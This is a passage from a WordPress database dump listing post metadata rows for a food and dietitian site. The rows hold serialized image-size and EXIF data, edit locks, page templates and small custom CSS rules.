"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"small-Logo-New-TR-web-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"small-Logo-New-TR-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12539,5027,'_wp_attached_file','2020/04/small-Logo-New-TR-web-1.jpg'),(12540,5027,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:177;s:4:\"file\";s:35:\"2020/04/small-Logo-New-TR-web-1.jpg\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"small-Logo-New-TR-web-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"small-Logo-New-TR-web-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"small-Logo-New-TR-web-1-300x89.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"small-Logo-New-TR-web-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"small-Logo-New-TR-web-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"small-Logo-New-TR-web-1-550x177.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"small-Logo-New-TR-web-1-550x177.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"small-Logo-New-TR-web-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"small-Logo-New-TR-web-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12541,2126,'_edit_lock','1587982964:1'),(12542,5028,'_wp_attached_file','2018/01/water-green.jpg'),(12543,5028,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1537;s:6:\"height\";i:1731;s:4:\"file\";s:23:\"2018/01/water-green.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"water-green-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"water-green-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"water-green-600x676.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:676;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"water-green-266x300.jpg\";s:5:\"width\";i:266;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"water-green-909x1024.jpg\";s:5:\"width\";i:909;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"water-green-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"water-green-768x865.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:23:\"water-green-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"water-green-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:25:\"water-green-1364x1536.jpg\";s:5:\"width\";i:1364;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:23:\"water-green-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:24:\"water-green-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:24:\"water-green-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:25:\"water-green-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"water-green-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"water-green-600x676.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:676;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"water-green-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431252075\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12544,2126,'_edit_last','1'),(12545,2126,'_wp_page_template','default'),(12548,2126,'rs_page_bg_color','#ffffff'),(12549,5029,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(12550,2132,'_edit_lock','1586456690:1'),(12551,5030,'_wp_attached_file','2018/01/quinoa-muffin-land.jpg'),(12552,5030,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1704;s:6:\"height\";i:1136;s:4:\"file\";s:30:\"2018/01/quinoa-muffin-land.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"quinoa-muffin-land-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"quinoa-muffin-land-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"quinoa-muffin-land-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"quinoa-muffin-land-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"quinoa-muffin-land-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"quinoa-muffin-land-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"quinoa-muffin-land-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"quinoa-muffin-land-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"quinoa-muffin-land-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"quinoa-muffin-land-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"quinoa-muffin-land-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"quinoa-muffin-land-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"quinoa-muffin-land-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"quinoa-muffin-land-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"quinoa-muffin-land-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"quinoa-muffin-land-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"quinoa-muffin-land-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1483865247\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12553,2132,'_edit_last','1'),(12554,2132,'_wp_page_template','default'),(12557,2132,'rs_page_bg_color','#ffffff'),(12558,5031,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(12561,2138,'_edit_lock','1586457061:1'),(12562,5032,'_wp_attached_file','2018/01/soup-tomato-1.jpg'),(12563,5032,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:875;s:6:\"height\";i:561;s:4:\"file\";s:25:\"2018/01/soup-tomato-1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"soup-tomato-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-600x385.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-768x492.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:492;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-875x550.jpg\";s:5:\"width\";i:875;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-550x561.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:561;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"soup-tomato-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-600x385.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"soup-tomato-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1492830929\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12564,2138,'_edit_last','1'),(12565,2138,'_wp_page_template','default'),(12568,2138,'rs_page_bg_color','#ffffff'),(12569,5033,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(12572,3061,'_wp_old_slug','side-area-img-4'),(12573,3061,'_edit_lock','1586524775:1'),(12574,3061,'portfolio_single_masonry_image_size',''),(12575,3061,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12576,3061,'_edit_last','1'),(12577,3061,'_wp_page_template','default'),(12578,875,'_edit_lock','1586678183:1'),(12579,10,'_edit_lock','1692893712:1'),(12580,390,'_edit_lock','1587304855:1'),(12581,390,'_wp_old_slug','banner-team'),(12582,390,'portfolio_single_masonry_image_size',''),(12583,390,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12584,390,'_edit_last','1'),(12585,390,'_wp_page_template','default'),(12586,390,'_wp_old_slug','me-and-my-book2-small'),(12587,670,'_wp_old_slug','blog-img-1'),(12588,670,'_edit_lock','1586678123:1'),(12589,670,'portfolio_single_masonry_image_size',''),(12590,670,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12591,670,'_edit_last','1'),(12592,670,'_wp_page_template','default'),(12593,670,'_wp_old_slug','working-with-a-dietitian-small'),(12594,875,'_edit_last','1'),(12595,875,'_wp_page_template','default'),(12598,875,'rs_page_bg_color','#ffffff'),(12599,5036,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(12600,906,'_wp_old_slug','blog-img-9'),(12601,906,'_edit_lock','1586679748:1'),(12602,906,'portfolio_single_masonry_image_size',''),(12603,906,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12604,906,'_edit_last','1'),(12605,906,'_wp_page_template','default'),(12606,912,'_wp_old_slug','blog-img-10'),(12607,912,'_edit_lock','1586680211:1'),(12608,912,'portfolio_single_masonry_image_size',''),(12609,912,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12610,912,'_edit_last','1'),(12611,912,'_wp_page_template','default'),(12612,910,'_edit_lock','1586680264:1'),(12613,910,'_edit_last','1'),(12614,910,'_wp_page_template','default'),(12617,910,'rs_page_bg_color','#ffffff'),(12618,5037,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(12619,902,'_edit_lock','1586680448:1'),(12620,902,'_edit_last','1'),(12621,902,'_wp_page_template','default'),(12624,902,'rs_page_bg_color','#ffffff'),(12625,5038,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(12628,5040,'_wp_attached_file','2020/04/working-with-dietitian-2.jpg'),(12629,5040,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1297;s:6:\"height\";i:867;s:4:\"file\";s:36:\"2020/04/working-with-dietitian-2.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"working-with-dietitian-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"working-with-dietitian-2-1024x685.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:685;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:37:\"working-with-dietitian-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-550x867.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:37:\"working-with-dietitian-2-1100x867.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"working-with-dietitian-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12630,5042,'_wp_attached_file','2020/04/Debra-Shine-on..jpg'),(12631,5042,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1747;s:6:\"height\";i:1240;s:4:\"file\";s:27:\"2020/04/Debra-Shine-on..jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"Debra-Shine-on.-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"Debra-Shine-on.-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"Debra-Shine-on.-600x426.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Debra-Shine-on.-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Debra-Shine-on.-1024x727.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:727;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Debra-Shine-on.-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Debra-Shine-on.-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"Debra-Shine-on.-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"Debra-Shine-on.-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"Debra-Shine-on.-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"Debra-Shine-on.-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"Debra-Shine-on.-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"Debra-Shine-on.-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"Debra-Shine-on.-600x426.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Debra-Shine-on.-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12632,5044,'_wp_attached_file','2020/04/Debra-Shine-on.-2.jpg'),(12633,5044,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1747;s:6:\"height\";i:1240;s:4:\"file\";s:29:\"2020/04/Debra-Shine-on.-2.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-600x426.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:426;s:9:\"mime-type\";s:1